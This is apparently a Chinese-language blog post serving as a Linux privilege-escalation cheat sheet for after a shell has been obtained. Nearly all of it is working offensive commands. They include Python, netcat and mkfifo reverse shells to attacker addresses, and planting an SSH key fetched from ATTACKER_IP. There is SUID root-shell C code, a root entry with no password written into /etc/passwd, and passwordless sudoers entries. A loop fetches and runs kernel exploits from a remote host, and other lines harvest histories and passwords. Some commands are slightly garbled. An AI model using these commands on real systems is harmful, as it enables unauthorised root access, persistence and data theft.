简介
这是一个Linux 提取的备忘录,涵盖了大部分常用姿势,本文为原创作品。
获得shell后
获得交互 Shell
1
|
$ python -c 'import pty;pty.spawn("/bin/bash")'
|
如果失败可设置PATH TERM和SHELL
1
2
3
|
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash
|
将公共密钥添加到授权密钥
1
|
$ echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authorized_keys
|
获得反弹 Shell 姿势
常用
1
|
$ python -c 'import pty; pty.spawn("/bin/sh")'
|
1
2
3
4
|
$ ssh user@$ip nc $localip 4444 -e /bin/sh
enter user's password
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ export TERM=linux
|
1
|
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
1
|
$ echo os.system('/bin/bash')
|
1
|
$ perl —e 'exec "/bin/sh";'
|
tcpdump
1
2
3
|
$ echo $’id\n/bin/netcat $ip 443 -e /bin/bash’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -I eth- -w /dev/null -W 1 -G 1 -z /tmp/.tst -Z root
|
busybox
1
2
3
4
5
6
7
8
9
|
:!bash
:set shell=/bin/bash:shell
!bash
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ;
awk 'BEGIN {system("/bin/bash")}'
--interactive
echo "os.execute('/bin/sh')"
sudo nmap --script=exploit.nse
perl -e 'exec "/bin/bash";'
|
手动提权常用姿势
sudo
1
2
3
|
$ sudo su -
$ sudo -l
|
查看root帐号
查找易受攻击/特权的组件,例如:mysql,sudo,udev,python
1
|
$ echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
|
使用netstat查找其他已连接的计算机
命令跳过配置文件中被忽略的行
1
|
$ alias nonempty="egrep -v '^[ \t]*#|^$'"
|
Mysql提权
如果Mysql以root身份运行,则可以使用sys_exec()运行命令。例如,要将用户添加到sudoers:
sys_exec('usermod -a -G admin username')
系统版本信息
1
|
$ cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
|
内核信息
1
|
$ cat /proc/version; uname -a; uname -mrs; rpm -q kernel; dmesg | grep Linux; ls /boot | grep vmlinuz-; file /bin/ls; cat /etc/lsb-release
|
环境变量
1
|
$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
|
查找打印机
查找已安装的应用
1
|
$ ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/*;
|
查找可写的配置文件
1
|
$ find /etc/ -writable -type f 2>/dev/null
|
配置错误的服务
1
|
$ cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
|
定时服务
1
|
$ crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny
|
Grep硬编码密码
1
2
3
4
|
$ grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
|
Web根目录中运行
1
|
$ grep "localhost" ./ -R
|
网络配置
1
|
$ /sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L; hostname; dnsdomainname
|
列出所有用户的主目录
1
|
$ ls -ahlR /root/; ls -ahlR /home/
|
历史记录
1
|
$ cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
|
邮件
1
|
$ cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
|
查找常用文件
1
|
$ find / -name wget; find / -name nc*; find / -name netcat*; find / -name tftp*; find / -name ftp
|
挂载的文件系统
1
|
$ mount; df -h; cat /etc/fstab
|
查找设置了SUID或GUID位的二进制文件。
1
2
3
|
$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
$ find / -perm -1000 -type d 2>/dev/null
$ find / -perm -g=s -type f 2>/dev/null
|
将二进制文件添加到PATH,以劫持另一个SUID二进制文件会在没有完全限定路径的情况下调用它。
1
2
3
4
|
$ function /usr/bin/foo () { /usr/bin/echo "It works"; }
$ export -f /usr/bin/foo
$ /usr/bin/foo
It works
|
如果您只可以更改PATH,则以下内容将添加刀=到反弹的ssh二进制文件:
1
2
3
|
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
|
为/bin/bash生成SUID C Shell
1
2
3
4
|
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
|
没有交互shell
1
|
$ echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
|
如果您可以root用户执行任何操作,则以下内容将更改为二进制所有者并设置SUID标志:
1
|
$ chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;
|
如果/etc/passwd的权限不正确,则可以root用户:
1
|
$ echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
|
将用户www-data添加到不带密码的sudoers中
1
|
$ echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
|
如果可以sudo chmod:
1
|
$echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c $ sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
|
通配符注入如果命令行中存在带有通配符的cron,则可以创建一个文件,该文件的名称将作为参数传递给cron任务,有关更多信息:
1
|
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
|
编译漏洞修复错误
1
|
$ gcc 9545.c -o 9545 -Wl,--hash-style=both
|
查找系统中的其他用途
1
|
$id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
|
全部可读/可写文件:
1
|
$ echo "world-writeable folders"; find / -writable -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -o w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o x -type d 2>/dev/null; echo "world-writeable & executable folders"; find / \( -perm -o w -perm -o x \) -type d 2>/dev/null;
|
查找世界可读的文件:
1
|
$ find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
|
查找没人拥有的文件
1
|
$ find /dir -xdev \( -nouser -o -nogroup \) -print
|
将用户添加到python中的sudoers中。
1
2
3
4
5
6
7
|
#!/usr/bin/env python
import os
import sys
try:
os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
sys.exit()
|
适用于2.3/2.4的Ring0内核漏洞
1
|
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
|
检查网络流量
1
|
$ tcpdump tcp port 80 -w output.pcap -i eth0
|
常用漏洞 exp
CVE-2010-3904-Linux RDS漏洞-Linux内核<= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/
Linux内核<= 2.6.37’Full-Nelson.c'
https://www.exploit-db.com/exploits/15704/
CVE-2012-0056-Mempodipper-Linux内核2.6.39 <3.2.2(Gentoo / Ubuntu x86 / x64)
https://git.zx2c4.com/CVE-2012-0056/about/
Linux CVE 2012-0056
1
2
3
|
wget -O exploit.c <http://www.exploit-db.com/download/18411>
gcc -o mempodipper exploit.c
./mempodipper
|
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/
编译脏牛:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
交叉编译漏洞
1
2
|
$ gcc -m32 -o output32 hello.c #(32 bit)
$ gcc -m64 -o output hello.c ## (64 bit)
|
Linux 2.6.32
https://www.exploit-db.com/exploits/15285/
远程打开xterm
启动 xserver
本地网络绑定到 xterm
1
|
$ xterm -display 127.0.0.1:1
|
目标链接本地计算机
1
|
$ /usr/openwin/bin/xterm -display yourip:1
|
快速获得flag
1
|
$ echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
|
2.6.x快速
1
|
$ for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
|
常用脚本
https://www.icekam.com/post/three-linux-privilege-scripts/
总结
比较全了,最近也在玩儿。